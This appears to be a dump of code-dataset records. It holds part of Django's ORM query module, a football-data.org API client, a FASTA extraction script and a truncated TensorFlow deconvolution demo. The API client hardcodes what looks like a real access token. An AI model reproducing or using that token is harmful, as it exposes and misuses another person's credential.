allow_joins, split_subq)\n joinpromoter.add_votes(needed_inner)\n else:\n child_clause, needed_inner = self.build_filter(child, can_reuse=used_aliases, branch_negated=branch_negated, current_negated=current_negated, connector=connector, allow_joins=allow_joins, split_subq=split_subq)\n joinpromoter.add_votes(needed_inner)\n if child_clause:\n target_clause.add(child_clause, connector)\n\n needed_inner = joinpromoter.update_join_types(self)\n return (target_clause, needed_inner)\n\n def names_to_path(self, names, opts, allow_many=True, fail_on_missing=False):\n \"\"\"\n Walks the list of names and turns them into PathInfo tuples. Note that\n a single name in 'names' can generate multiple PathInfos (m2m for\n example).\n\n 'names' is the path of names to travel, 'opts' is the model Options we\n start the name resolving from, 'allow_many' is as for setup_joins().\n If fail_on_missing is set to True, then a name that can't be resolved\n will generate a FieldError.\n\n Returns a list of PathInfo tuples. In addition returns the final field\n (the last used join field), and target (which is a field guaranteed to\n contain the same value as the final field). Finally, the method returns\n those names that weren't found (which are likely transforms and the\n final lookup).\n \"\"\"\n path, names_with_path = [], []\n for pos, name in enumerate(names):\n cur_names_with_path = (\n name, [])\n if name == 'pk':\n name = opts.pk.name\n field = None\n try:\n field = opts.get_field(name)\n except FieldDoesNotExist:\n if name in self.annotation_select:\n field = self.annotation_select[name].output_field\n elif pos == 0:\n for rel in opts.related_objects:\n if name == rel.related_model._meta.model_name and rel.related_name == rel.related_model._meta.default_related_name:\n related_name = rel.related_name\n field = opts.get_field(related_name)\n warnings.warn(\"Query lookup '%s' is deprecated in favor of Meta.default_related_name '%s'.\" % (\n name, related_name), RemovedInDjango20Warning, 2)\n break\n\n if field is not None:\n if field.is_relation and not field.related_model:\n raise FieldError('Field %r does not generate an automatic reverse relation and therefore cannot be used for reverse querying. If it is a GenericForeignKey, consider adding a GenericRelation.' % name)\n try:\n model = field.model._meta.concrete_model\n except AttributeError:\n model = None\n\n else:\n pos -= 1\n if pos == -1 or fail_on_missing:\n field_names = list(get_field_names_from_opts(opts))\n available = sorted(field_names + list(self.annotation_select))\n raise FieldError(\"Cannot resolve keyword '%s' into field. Choices are: %s\" % (\n name, (', ').join(available)))\n break\n if model is not opts.model:\n path_to_parent = opts.get_path_to_parent(model)\n if path_to_parent:\n path.extend(path_to_parent)\n cur_names_with_path[1].extend(path_to_parent)\n opts = path_to_parent[(-1)].to_opts\n if hasattr(field, 'get_path_info'):\n pathinfos = field.get_path_info()\n if not allow_many:\n for inner_pos, p in enumerate(pathinfos):\n if p.m2m:\n cur_names_with_path[1].extend(pathinfos[0:inner_pos + 1])\n names_with_path.append(cur_names_with_path)\n raise MultiJoin(pos + 1, names_with_path)\n\n last = pathinfos[(-1)]\n path.extend(pathinfos)\n final_field = last.join_field\n opts = last.to_opts\n targets = last.target_fields\n cur_names_with_path[1].extend(pathinfos)\n names_with_path.append(cur_names_with_path)\n else:\n final_field = field\n targets = (field,)\n if fail_on_missing and pos + 1 != len(names):\n raise FieldError(\"Cannot resolve keyword %r into field. Join on '%s' not permitted.\" % (\n names[(pos + 1)], name))\n break\n\n return (\n path, final_field, targets, names[pos + 1:])\n\n def setup_joins(self, names, opts, alias, can_reuse=None, allow_many=True):\n \"\"\"\n Compute the necessary table joins for the passage through the fields\n given in 'names'. 'opts' is the Options class for the current model\n (which gives the table we are starting from), 'alias' is the alias for\n the table to start the joining from.\n\n The 'can_reuse' defines the reverse foreign key joins we can reuse. It\n can be None in which case all joins are reusable or a set of aliases\n that can be reused. Note that non-reverse foreign keys are always\n reusable when using setup_joins().\n\n If 'allow_many' is False, then any reverse foreign key seen will\n generate a MultiJoin exception.\n\n Returns the final field involved in the joins, the target field (used\n for any 'where' constraint), the final 'opts' value, the joins and the\n field path travelled to generate the joins.\n\n The target field is the field containing the concrete value. Final\n field can be something different, for example foreign key pointing to\n that value. Final field is needed for example in some value\n conversions (convert 'obj' in fk__id=obj to pk val using the foreign\n key field for example).\n \"\"\"\n joins = [\n alias]\n path, final_field, targets, rest = self.names_to_path(names, opts, allow_many, fail_on_missing=True)\n for join in path:\n opts = join.to_opts\n if join.direct:\n nullable = self.is_nullable(join.join_field)\n else:\n nullable = True\n connection = Join(opts.db_table, alias, None, INNER, join.join_field, nullable)\n reuse = can_reuse if join.m2m else None\n alias = self.join(connection, reuse=reuse)\n joins.append(alias)\n\n return (\n final_field, targets, opts, joins, path)\n\n def trim_joins(self, targets, joins, path):\n \"\"\"\n The 'target' parameter is the final field being joined to, 'joins'\n is the full list of join aliases. The 'path' contain the PathInfos\n used to create the joins.\n\n Returns the final target field and table alias and the new active\n joins.\n\n We will always trim any direct join if we have the target column\n available already in the previous table. Reverse joins can't be\n trimmed as we don't know if there is anything on the other side of\n the join.\n \"\"\"\n joins = joins[:]\n for pos, info in enumerate(reversed(path)):\n if len(joins) == 1 or not info.direct:\n break\n join_targets = set(t.column for t in info.join_field.foreign_related_fields)\n cur_targets = set(t.column for t in targets)\n if not cur_targets.issubset(join_targets):\n break\n targets_dict = {r[1].column:r[0] for r in info.join_field.related_fields if r[1].column in cur_targets}\n targets = tuple(targets_dict[t.column] for t in targets)\n self.unref_alias(joins.pop())\n\n return (\n targets, joins[(-1)], joins)\n\n def resolve_ref(self, name, allow_joins=True, reuse=None, summarize=False):\n if not allow_joins and LOOKUP_SEP in name:\n raise FieldError('Joined field references are not permitted in this query')\n if name in self.annotations:\n if summarize:\n return Ref(name, self.annotation_select[name])\n else:\n return self.annotation_select[name]\n\n else:\n field_list = name.split(LOOKUP_SEP)\n field, sources, opts, join_list, path = self.setup_joins(field_list, self.get_meta(), self.get_initial_alias(), reuse)\n targets, _, join_list = self.trim_joins(sources, join_list, path)\n if len(targets) > 1:\n raise FieldError(\"Referencing multicolumn fields with F() objects isn't supported\")\n if reuse is not None:\n reuse.update(join_list)\n col = targets[0].get_col(join_list[(-1)], sources[0])\n return col\n return\n\n def split_exclude(self, filter_expr, prefix, can_reuse, names_with_path):\n \"\"\"\n When doing an exclude against any kind of N-to-many relation, we need\n to use a subquery. This method constructs the nested query, given the\n original exclude filter (filter_expr) and the portion up to the first\n N-to-many relation field.\n\n As an example we could have original filter ~Q(child__name='foo').\n We would get here with filter_expr = child__name, prefix = child and\n can_reuse is a set of joins usable for filters in the original query.\n\n We will turn this into equivalent of:\n WHERE NOT (pk IN (SELECT parent_id FROM thetable\n WHERE name = 'foo' AND parent_id IS NOT NULL))\n\n It might be worth it to consider using WHERE NOT EXISTS as that has\n saner null handling, and is easier for the backend's optimizer to\n handle.\n \"\"\"\n query = Query(self.model)\n query.add_filter(filter_expr)\n query.clear_ordering(True)\n trimmed_prefix, contains_louter = query.trim_start(names_with_path)\n col = query.select[0]\n select_field = col.target\n alias = col.alias\n if self.is_nullable(select_field):\n lookup_class = select_field.get_lookup('isnull')\n lookup = lookup_class(select_field.get_col(alias), False)\n query.where.add(lookup, AND)\n if alias in can_reuse:\n pk = select_field.model._meta.pk\n query.bump_prefix(self)\n lookup_class = select_field.get_lookup('exact')\n lookup = lookup_class(pk.get_col(query.select[0].alias), pk.get_col(alias))\n query.where.add(lookup, AND)\n query.external_aliases.add(alias)\n condition, needed_inner = self.build_filter((\n '%s__in' % trimmed_prefix, query), current_negated=True, branch_negated=True, can_reuse=can_reuse)\n if contains_louter:\n or_null_condition, _ = self.build_filter((\n '%s__isnull' % trimmed_prefix, True), current_negated=True, branch_negated=True, can_reuse=can_reuse)\n condition.add(or_null_condition, OR)\n return (\n condition, needed_inner)\n\n def set_empty(self):\n self.where.add(NothingNode(), AND)\n\n def is_empty(self):\n return any(isinstance(c, NothingNode) for c in self.where.children)\n\n def set_limits(self, low=None, high=None):\n \"\"\"\n Adjusts the limits on the rows retrieved. We use low/high to set these,\n as it makes it more Pythonic to read and write. When the SQL query is\n created, they are converted to the appropriate offset and limit values.\n\n Any limits passed in here are applied relative to the existing\n constraints. So low is added to the current low value and both will be\n clamped to any existing high value.\n \"\"\"\n if high is not None:\n if self.high_mark is not None:\n self.high_mark = min(self.high_mark, self.low_mark + high)\n else:\n self.high_mark = self.low_mark + high\n if low is not None:\n if self.high_mark is not None:\n self.low_mark = min(self.high_mark, self.low_mark + low)\n else:\n self.low_mark = self.low_mark + low\n if self.low_mark == self.high_mark:\n self.set_empty()\n return\n\n def clear_limits(self):\n \"\"\"\n Clears any existing limits.\n \"\"\"\n self.low_mark, self.high_mark = (0, None)\n return\n\n def can_filter(self):\n \"\"\"\n Returns True if adding filters to this instance is still possible.\n\n Typically, this means no limits or offsets have been put on the results.\n \"\"\"\n return not self.low_mark and self.high_mark is None\n\n def clear_select_clause(self):\n \"\"\"\n Removes all fields from SELECT clause.\n \"\"\"\n self.select = []\n self.default_cols = False\n self.select_related = False\n self.set_extra_mask(())\n self.set_annotation_mask(())\n\n def clear_select_fields(self):\n \"\"\"\n Clears the list of fields to select (but not extra_select columns).\n Some queryset types completely replace any existing list of select\n columns.\n \"\"\"\n self.select = []\n self.values_select = []\n\n def add_select(self, col):\n self.default_cols = False\n self.select.append(col)\n\n def set_select(self, cols):\n self.default_cols = False\n self.select = cols\n\n def add_distinct_fields(self, *field_names):\n \"\"\"\n Adds and resolves the given fields to the query's \"distinct on\" clause.\n \"\"\"\n self.distinct_fields = field_names\n self.distinct = True\n\n def add_fields(self, field_names, allow_m2m=True):\n \"\"\"\n Adds the given (model) fields to the select set. The field names are\n added in the order specified.\n \"\"\"\n alias = self.get_initial_alias()\n opts = self.get_meta()\n try:\n for name in field_names:\n _, targets, _, joins, path = self.setup_joins(name.split(LOOKUP_SEP), opts, alias, allow_many=allow_m2m)\n targets, final_alias, joins = self.trim_joins(targets, joins, path)\n for target in targets:\n self.add_select(target.get_col(final_alias))\n\n except MultiJoin:\n raise FieldError(\"Invalid field name: '%s'\" % name)\n except FieldError:\n if LOOKUP_SEP in name:\n raise\n else:\n names = sorted(list(get_field_names_from_opts(opts)) + list(self.extra) + list(self.annotation_select))\n raise FieldError('Cannot resolve keyword %r into field. Choices are: %s' % (\n name, (', ').join(names)))\n\n def add_ordering(self, *ordering):\n \"\"\"\n Adds items from the 'ordering' sequence to the query's \"order by\"\n clause. These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, all ordering is cleared from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if not hasattr(item, 'resolve_expression') and not ORDER_PATTERN.match(item):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError('Using an aggregate in order_by() without also including it in annotate() is not allowed: %s' % item)\n\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by.extend(ordering)\n else:\n self.default_ordering = False\n\n def clear_ordering(self, force_empty):\n \"\"\"\n Removes any ordering settings. If 'force_empty' is True, there will be\n no ordering in the resulting query (not even the model's default).\n \"\"\"\n self.order_by = []\n self.extra_order_by = ()\n if force_empty:\n self.default_ordering = False\n\n def set_group_by(self):\n \"\"\"\n Expands the GROUP BY clause required by the query.\n\n This will usually be the set of all non-aggregate fields in the\n return data. If the database backend supports grouping by the\n primary key, and the query would be equivalent, the optimization\n will be made automatically.\n \"\"\"\n self.group_by = []\n for col in self.select:\n self.group_by.append(col)\n\n if self.annotation_select:\n for alias, annotation in six.iteritems(self.annotation_select):\n for col in annotation.get_group_by_cols():\n self.group_by.append(col)\n\n def add_select_related(self, fields):\n \"\"\"\n Sets up the select_related data structure so that we only select\n certain related models (as opposed to all models, when\n self.select_related=True).\n \"\"\"\n if isinstance(self.select_related, bool):\n field_dict = {}\n else:\n field_dict = self.select_related\n for field in fields:\n d = field_dict\n for part in field.split(LOOKUP_SEP):\n d = d.setdefault(part, {})\n\n self.select_related = field_dict\n\n def add_extra(self, select, select_params, where, params, tables, order_by):\n \"\"\"\n Adds data to the various extra_* attributes for user-created additions\n to the query.\n \"\"\"\n if select:\n select_pairs = OrderedDict()\n if select_params:\n param_iter = iter(select_params)\n else:\n param_iter = iter([])\n for name, entry in select.items():\n entry = force_text(entry)\n entry_params = []\n pos = entry.find('%s')\n while pos != -1:\n if pos == 0 or entry[(pos - 1)] != '%':\n entry_params.append(next(param_iter))\n pos = entry.find('%s', pos + 2)\n\n select_pairs[name] = (\n entry, entry_params)\n\n self.extra.update(select_pairs)\n if where or params:\n self.where.add(ExtraWhere(where, params), AND)\n if tables:\n self.extra_tables += tuple(tables)\n if order_by:\n self.extra_order_by = order_by\n\n def clear_deferred_loading(self):\n \"\"\"\n Remove any fields from the deferred loading set.\n \"\"\"\n self.deferred_loading = (\n set(), True)\n\n def add_deferred_loading(self, field_names):\n \"\"\"\n Add the given list of model field names to the set of fields to\n exclude from loading from the database when automatic column selection\n is done. The new field names are added to any existing field names that\n are deferred (or removed from any existing field names that are marked\n as the only ones for immediate loading).\n \"\"\"\n existing, defer = self.deferred_loading\n if defer:\n self.deferred_loading = (existing.union(field_names), True)\n else:\n self.deferred_loading = (\n existing.difference(field_names), False)\n\n def add_immediate_loading(self, field_names):\n \"\"\"\n Add the given list of model field names to the set of fields to\n retrieve when the SQL is executed (\"immediate loading\" fields). The\n field names replace any existing immediate loading field names. If\n there are field names already specified for deferred loading, those\n names are removed from the new field_names before storing the new names\n for immediate loading. (That is, immediate loading overrides any\n existing immediate values, but respects existing deferrals.)\n \"\"\"\n existing, defer = self.deferred_loading\n field_names = set(field_names)\n if 'pk' in field_names:\n field_names.remove('pk')\n field_names.add(self.get_meta().pk.name)\n if defer:\n self.deferred_loading = (\n field_names.difference(existing), False)\n else:\n self.deferred_loading = (\n field_names, False)\n\n def get_loaded_field_names(self):\n \"\"\"\n If any fields are marked to be deferred, returns a dictionary mapping\n models to a set of names in those fields that will be loaded. If a\n model is not in the returned dictionary, none of its fields are\n deferred.\n\n If no fields are marked for deferral, returns an empty dictionary.\n \"\"\"\n try:\n return self._loaded_field_names_cache\n except AttributeError:\n collection = {}\n self.deferred_to_data(collection, self.get_loaded_field_names_cb)\n self._loaded_field_names_cache = collection\n return collection\n\n def get_loaded_field_names_cb(self, target, model, fields):\n \"\"\"\n Callback used by get_deferred_field_names().\n \"\"\"\n target[model] = {f.attname for f in fields}\n\n def set_annotation_mask(self, names):\n \"\"\"Set the mask of annotations that will actually be returned by the SELECT\"\"\"\n if names is None:\n self.annotation_select_mask = None\n else:\n self.annotation_select_mask = set(names)\n self._annotation_select_cache = None\n return\n\n def append_annotation_mask(self, names):\n if self.annotation_select_mask is not None:\n self.set_annotation_mask(set(names).union(self.annotation_select_mask))\n return\n\n def set_extra_mask(self, names):\n \"\"\"\n Set the mask of extra select items that will be returned by SELECT,\n we don't actually remove them from the Query since they might be used\n later\n \"\"\"\n if names is None:\n self.extra_select_mask = None\n else:\n self.extra_select_mask = set(names)\n self._extra_select_cache = None\n return\n\n def set_values(self, fields):\n self.select_related = False\n self.clear_deferred_loading()\n self.clear_select_fields()\n if self.group_by is True:\n self.add_fields((f.attname for f in self.model._meta.concrete_fields), False)\n self.set_group_by()\n self.clear_select_fields()\n if fields:\n field_names = []\n extra_names = []\n annotation_names = []\n if not self._extra and not self._annotations:\n field_names = list(fields)\n else:\n self.default_cols = False\n for f in fields:\n if f in self.extra_select:\n extra_names.append(f)\n elif f in self.annotation_select:\n annotation_names.append(f)\n else:\n field_names.append(f)\n\n self.set_extra_mask(extra_names)\n self.set_annotation_mask(annotation_names)\n else:\n field_names = [ f.attname for f in self.model._meta.concrete_fields ]\n self.values_select = field_names\n self.add_fields(field_names, True)\n\n @property\n def annotation_select(self):\n \"\"\"The OrderedDict of aggregate columns that are not masked, and should\n be used in the SELECT clause.\n\n This result is cached for optimization purposes.\n \"\"\"\n if self._annotation_select_cache is not None:\n return self._annotation_select_cache\n else:\n if not self._annotations:\n return {}\n else:\n if self.annotation_select_mask is not None:\n self._annotation_select_cache = OrderedDict((k, v) for k, v in self.annotations.items() if k in self.annotation_select_mask)\n return self._annotation_select_cache\n return self.annotations\n\n return\n\n @property\n def extra_select(self):\n if self._extra_select_cache is not None:\n return self._extra_select_cache\n else:\n if not self._extra:\n return {}\n else:\n if self.extra_select_mask is not None:\n self._extra_select_cache = OrderedDict((k, v) for k, v in self.extra.items() if k in self.extra_select_mask)\n return self._extra_select_cache\n return self.extra\n\n return\n\n def trim_start(self, names_with_path):\n \"\"\"\n Trims joins from the start of the join path. The candidates for trim\n are the PathInfos in names_with_path structure that are m2m joins.\n\n Also sets the select column so the start matches the join.\n\n This method is meant to be used for generating the subquery joins &\n cols in split_exclude().\n\n Returns a lookup usable for doing outerq.filter(lookup=self). Returns\n also if the joins in the prefix contain a LEFT OUTER join.\n _\"\"\"\n all_paths = []\n for _, paths in names_with_path:\n all_paths.extend(paths)\n\n contains_louter = False\n lookup_tables = [ t for t in self.tables if t in self._lookup_joins or t == self.tables[0] ]\n for trimmed_paths, path in enumerate(all_paths):\n if path.m2m:\n break\n if self.alias_map[lookup_tables[(trimmed_paths + 1)]].join_type == LOUTER:\n contains_louter = True\n alias = lookup_tables[trimmed_paths]\n self.unref_alias(alias)\n\n join_field = path.join_field.field\n paths_in_prefix = trimmed_paths\n trimmed_prefix = []\n for name, path in names_with_path:\n if paths_in_prefix - len(path) < 0:\n break\n trimmed_prefix.append(name)\n paths_in_prefix -= len(path)\n\n trimmed_prefix.append(join_field.foreign_related_fields[0].name)\n trimmed_prefix = LOOKUP_SEP.join(trimmed_prefix)\n if self.alias_map[lookup_tables[(trimmed_paths + 1)]].join_type != LOUTER:\n select_fields = [ r[0] for r in join_field.related_fields ]\n select_alias = lookup_tables[(trimmed_paths + 1)]\n self.unref_alias(lookup_tables[trimmed_paths])\n extra_restriction = join_field.get_extra_restriction(self.where_class, None, lookup_tables[(trimmed_paths + 1)])\n if extra_restriction:\n self.where.add(extra_restriction, AND)\n else:\n select_fields = [ r[1] for r in join_field.related_fields ]\n select_alias = lookup_tables[trimmed_paths]\n for table in self.tables:\n if self.alias_refcount[table] > 0:\n self.alias_map[table] = BaseTable(self.alias_map[table].table_name, table)\n break\n\n self.set_select([ f.get_col(select_alias) for f in select_fields ])\n return (trimmed_prefix, contains_louter)\n\n def is_nullable(self, field):\n \"\"\"\n A helper to check if the given field should be treated as nullable.\n\n Some backends treat '' as null and Django treats such fields as\n nullable for those backends. In such situations field.null can be\n False even if we should treat the field as nullable.\n \"\"\"\n if connections[DEFAULT_DB_ALIAS].features.interprets_empty_strings_as_nulls and field.empty_strings_allowed:\n return True\n else:\n return field.null\n\n def as_subquery_filter(self, db):\n self._db = db\n self.subquery = True\n if self.low_mark == 0 and self.high_mark is None and not self.distinct_fields and not self.select_for_update:\n self.clear_ordering(True)\n return self\n\n\ndef get_order_dir(field, default='ASC'):\n \"\"\"\n Returns the field name and direction for an order specification. For\n example, '-foo' is returned as ('foo', 'DESC').\n\n The 'default' param is used to indicate which way no prefix (or a '+'\n prefix) should sort. The '-' prefix always sorts the opposite way.\n \"\"\"\n dirn = ORDER_DIR[default]\n if field[0] == '-':\n return (field[1:], dirn[1])\n return (\n field, dirn[0])\n\n\ndef add_to_dict(data, key, value):\n \"\"\"\n A helper function to add \"value\" to the set of values for \"key\", whether or\n not \"key\" already exists.\n \"\"\"\n if key in data:\n data[key].add(value)\n else:\n data[key] = {\n value}\n\n\ndef is_reverse_o2o(field):\n \"\"\"\n A little helper to check if the given field is reverse-o2o. The field is\n expected to be some sort of relation field or related object.\n \"\"\"\n return field.is_relation and field.one_to_one and not field.concrete\n\n\nclass JoinPromoter(object):\n \"\"\"\n A class to abstract away join promotion problems for complex filter\n conditions.\n \"\"\"\n\n def __init__(self, connector, num_children, negated):\n self.connector = connector\n self.negated = negated\n if self.negated:\n if connector == AND:\n self.effective_connector = OR\n else:\n self.effective_connector = AND\n else:\n self.effective_connector = self.connector\n self.num_children = num_children\n self.votes = Counter()\n\n def add_votes(self, votes):\n \"\"\"\n Add single vote per item to self.votes. Parameter can be any\n iterable.\n \"\"\"\n self.votes.update(votes)\n\n def update_join_types(self, query):\n \"\"\"\n Change join types so that the generated query is as efficient as\n possible, but still correct. So, change as many joins as possible\n to INNER, but don't make OUTER joins INNER if that could remove\n results from the query.\n \"\"\"\n to_promote = set()\n to_demote = set()\n for table, votes in self.votes.items():\n if self.effective_connector == 'OR' and votes < self.num_children:\n to_promote.add(table)\n if self.effective_connector == 'AND' or self.effective_connector == 'OR' and votes == self.num_children:\n to_demote.add(table)\n\n query.promote_joins(to_promote)\n query.demote_joins(to_demote)\n return to_demote","sub_path":"pycfiles/djx-0.0.4-py2-none-any/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":73909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48978567","text":"import re\nimport requests\n\n\nclass FBDataHandler:\n\n def __init__(self, league_id, season='2019', stage='REGULAR_SEASON', status='FINISHED'):\n self.baseUrl = 'https://api.football-data.org/v2/'\n self.apiToken = '065434220db543f6aafdb8565d85d359'\n self.headers = { 'X-Auth-Token': self.apiToken }\n self.league_ids = {\n 'ASL': '2024', 'BSA': '2013', 'BL' : '2002',\n 'FL1': '2015', 'PL' : '2021', 'ELC': '2016',\n 'PD' : '2014', 'SA' : '2019', 'PPL': '2017',\n 'DED': '2003', 'MLS': '2145', 'CL' : '2001',\n 'EL' : '2146'\n }\n AZ = re.search(r\"([A-Z])\\w+\", league_id)\n if AZ:\n self.league_id = self.league_ids[league_id]\n else:\n self.league_id = league_id\n self.season = season\n self.stage = stage\n self.status = status\n\n def _get(self, url, params={}):\n req = requests.get(self.baseUrl + url, headers=self.headers, params=params)\n status_code = req.status_code\n if status_code == requests.codes.ok:\n return req\n else:\n print(\"Request Error:\", status_code)\n return\n\n def get_teams(self):\n params = {'season': self.season, 'stage': self.stage}\n req = self._get('competitions/{id}/teams'.format(id=self.league_id), params=params)\n return req.json()\n\n def df_setup(self):\n print(\"Setting up dataframe...\")\n tmsReq = self.get_teams()\n tmsInit = {'attrs': {}, 'data': {}}\n for team in tmsReq['teams']:\n tmsInit['data'][team['id']] = {\n 'name': team['name'],\n 'shortName': team['shortName'],\n 'tla': team['tla'],\n 'eloRun': [1500],\n 'eloNow': 1500,\n 'fixtures': [],\n 'results': [],\n 'tablePos': 0,\n 'matches': 0,\n 'won': 0,\n 'draw': 0,\n 'lost': 0,\n 'points': 0,\n 'goalsFor': 0,\n 'goalsAga': 0,\n 'goalDiff': 0\n }\n return tmsInit\n\n def get_league_results(self):\n params = {'season': self.season, 'stage': self.stage, 'status': self.status}\n print(\"Getting league results...\")\n req = self._get('competitions/{id}/matches'.format(id=self.league_id), params=params)\n return req.json()\n\n def get_standings(self):\n params = {'season': self.season, 'stage': self.stage, 'standingType': 'TOTAL'}\n print(\"Getting league standings...\")\n req = self._get('competitions/{id}/standings'.format(id=self.league_id), params=params)\n return req.json()\n","sub_path":"app/data/FBApi.py","file_name":"FBApi.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"434101088","text":"# Goal: to save the peak files for AA cross in a fasta file in LG3\n\naafa = open('/Volumes/group_dv/group/data/sequences/fastafiles/cross-AAo/NfAAo_export_hp.fa', 'rU').read()\npeak_lg3 = ['33911', '8423', '19589', '39073', '25587', '44971', '8178', '4179', \n '32767', '26568', '26780', '2663', '36581', '12275', '34490', '39114', \n '10884', '2093', '6074', '18588', '32724', '32599']\n\n\n# In[3]:\n\nkfaa = [i[1:] for i in aafa.split('\\n')[:-1][:-1:2]]\nvfaa = aafa.split('\\n')[:-1][1::2]\ndfaa = dict(zip(kfaa, vfaa))\n\n\n# In[8]:\n\naalm = open('/Volumes/group_dv/personal/DValenzano/May2014/aao32014_swi_pos.csv', 'rU').read()\naalm = aalm.replace('\"','')\n\n\n# In[13]:\n\nkaa = [i.split(',')[0] for i in aalm.split('\\n')[1:-1]]\nvaa = [','.join(i.split(',')[1:]) for i in aalm.split('\\n')[1:-1]]\ndaa = dict(zip(kaa,vaa))\n\n\n# In[15]:\n\naaz = ','.join([ '>'+i+'_LG'+daa[i]+'\\n'+dfaa[i]+'\\n' for i in peak_lg3 ]).replace('\\n,','\\n')\n\n\n# In[18]:\n\nz = open('/Volumes/group_dv/personal/DValenzano/Nov2014/AA-cross/peak_lg3.fa', 'w')\nz.write(aaz)\nz.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"07-Nov-2014.py","file_name":"07-Nov-2014.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561402385","text":"import pydarknet\nfrom pydarknet import Detector, Image\nfrom tf_pose.networks import get_graph_path\nimport cv2\nimport datetime\nfrom utils import is_moving, save_object, object_interaction\n\ndef load_pydarknet(args, logger):\n # Optional statement to configure preferred GPU. Available only in GPU version.\n pydarknet.set_cuda_device(0)\n\n #Object\n if (args.demo == 'total' or args.demo == 'objects'):\n net = Detector(bytes(args.cfg, encoding=\"utf-8\"), bytes(args.weights, encoding=\"utf-8\"), 0,\n bytes(\"cfg/coco.data\", encoding=\"utf-8\"))\n ##Pose\n logger.debug('initialization %s : %s' % (args.model, get_graph_path(args.model)))\n\n return net\n\ndef analyze_results(image, results, humans, height, width, object_list, objects, objects_detected, saved):\n count_f = 0\n\n for obj in object_list:\n vars()[obj+'s']=[]\n vars()[obj+'_mov']=False\n vars()['dist_r_'+obj]=1000\n vars()['dist_l_'+obj]=1000\n vars()[obj+'_track_time']=[]\n vars()[obj+'_track_x']=[]\n vars()[obj+'_track_y']=[]\n\n if results:\n print('objects detected')\n \n for obj in results:\n for measure in object_list:\n if (measure in str(obj)):\n vars()[measure+'_detect']=True\n vars()[measure+'s'].append(obj)\n vars()[measure+'_mov']=is_moving(vars()[measure+'s'],20)\n vars()[measure+'_index']=results.index(obj)\n vars()[measure+'_track_time'].append((datetime.now().strftime('%d/%m/%H:%M:%S')))\n vars()[measure+'_track_x'].append(obj[-1][0])\n vars()[measure+'_track_y'].append(height-obj[-1][1])\n\n for cat, score, bounds in results:\n x, y, w, h = bounds\n objects+=str((str(cat.decode(\"utf-8\")),round(score,3)))\n print(objects)\n if cat.decode(\"utf-8\")=='cup':\n if saved:\n print(saved)\n for obj in saved:\n print(obj[0])\n if ('cup' not in obj[0]):\n count=0\n save_object(cat, score, bounds)\n else:\n count+=1\n # print(saved)\n if count >=5:\n saved.remove(obj)\n else:\n save_object()\n else:\n if saved:\n count_f+=1\n if count_f >= 3:\n saved.clear()\n count_f=0\n # print(saved)\n\n #Distance from hand to object\n for human in humans:\n r_wrist = human.body_parts.get(4, None)\n l_wrist = human.body_parts.get(7, None)\n\n for obj in object_list:\n if (vars()[obj+'_detect']==True):\n if r_wrist != None :\n vars()['dist_r_'+obj]=object_interaction(results[vars()[obj+'_index']][2],r_wrist.x*width,r_wrist.y*height)\n\n if l_wrist != None :\n vars()['dist_l_'+obj]=object_interaction(results[vars()[obj+'_index']][2],l_wrist.x*width,l_wrist.y*height)\n # print( vars()['dist_r_'+obj])\n\n #Stablishing interaction\n dist_thresh=150\n for obj in object_list:\n if vars()[obj+'_detect']==True:\n if (vars()[obj+'_mov']==True or vars()['dist_r_'+obj]池化层\r\nW_conv1 = weight_variable([5,5,3,64])\r\nb_conv1 = bias_variable([64])\r\n\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1) #输出为[128,24,24,64]\r\nprint_op_shape(h_conv1)\r\nh_pool1,mask1 = max_pool_with_argmax(h_conv1,2) #输出为[128,12,12,64]\r\n#h_pool1 = max_pool_2x2(h_conv1) #输出为[128,12,12,64]\r\nprint_op_shape(h_pool1)\r\n\r\n\r\n#2.卷积层 ->池化层\r\nW_conv2 = weight_variable([5,5,64,64])\r\nb_conv2 = bias_variable([64])\r\n\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2) + b_conv2) #输出为[128,12,12,64]\r\nprint_op_shape(h_conv2)\r\nh_pool2,mask2 = max_pool_with_argmax(h_conv2,2) #输出为[128,6,6,64]\r\n#h_pool2 = max_pool_2x2(h_conv2) #输出为[128,6,6,64]\r\nprint_op_shape(h_pool2)\r\n\r\n\r\n#3 反卷积第二层卷积结果\r\nt_conv2 = un_max_pool(h_pool2,mask2,2) \r\nprint_op_shape(t_conv2) #输出为[128,12,12,64] \r\nt_pool1 = tf.nn.conv2d_transpose(t_conv2 - b_conv2,W_conv2,output_shape=h_pool1.shape,strides=[1,1,1,1],padding='SAME')\r\nprint_op_shape(t_pool1) #输出为[128,12,12,64]\r\nt_conv1 = un_max_pool(t_pool1,mask1,2)\r\nprint_op_shape(t_conv1) #输出为[128,24,24,64] \r\nt_x_image = tf.nn.conv2d_transpose(t_conv1 - b_conv1,W_conv1,output_shape=x_image.shape,strides=[1,1,1,1],padding='SAME') #生成原始图\r\nprint_op_shape(t_x_image) #输出为[128,24,25,3]\r\n\r\n\r\n#4 反卷积第一层卷积结果\r\nt1_conv1 = un_max_pool(h_pool1,mask1,2)\r\nprint_op_shape(t1_conv1)\r\nt1_x_image = tf.nn.conv2d_transpose(t1_conv1 - b_conv1,W_conv1,output_shape=x_image.shape,strides=[1,1,1,1],padding='SAME') #生成原始图\r\nprint_op_shape(t1_x_image) \r\n\r\n\r\n#合并还原结果,并输出给TensorBoard输出\r\nstictched_decodings = tf.concat((x_image,t1_x_image,t_x_image),axis=2)\r\n#stictched_decodings = x_image\r\n#图像数据汇总,并命名为'source/cifar'\r\ndecoding_summary_op = tf.summary.image('source/cifar',stictched_decodings)\r\n\r\n#5.卷积层 ->全局平均池化层\r\nW_conv3 = weight_variable([5,5,64,10])\r\nb_conv3 = bias_variable([10])\r\n\r\nh_conv3 = tf.nn.relu(conv2d(h_pool2,W_conv3) + b_conv3) 